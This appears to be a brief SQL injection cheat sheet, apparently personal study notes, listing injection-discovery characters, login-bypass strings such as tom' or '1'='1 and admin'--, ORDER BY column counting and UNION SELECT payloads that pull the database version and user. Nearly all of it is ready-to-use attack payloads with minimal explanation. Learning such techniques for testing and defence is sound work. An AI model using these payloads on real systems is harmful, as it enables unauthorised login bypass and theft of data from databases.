SQL Injections

Basic SQLi Discovery

Payload	URL Encoded
'	%27
"	%22
#	%23
;	%3B
)	%29

Basic Injection

tom' or '1'='1

Using Comments

admin'--

Another Example

admin')--
admin') -- -

') or id = 5 -- -

UNION Injection

Using ORDER BY

' order by 1-- -
# We do the same for column 3 and 4 and get the results back. However, when we try to ORDER BY column 5, we get the following error:

Using UNION

cn' UNION select 1,2,3-- -

cn' UNION select 1,@@version,3,4-- -

Other Example

cn' union select 1,user(),3,4-- -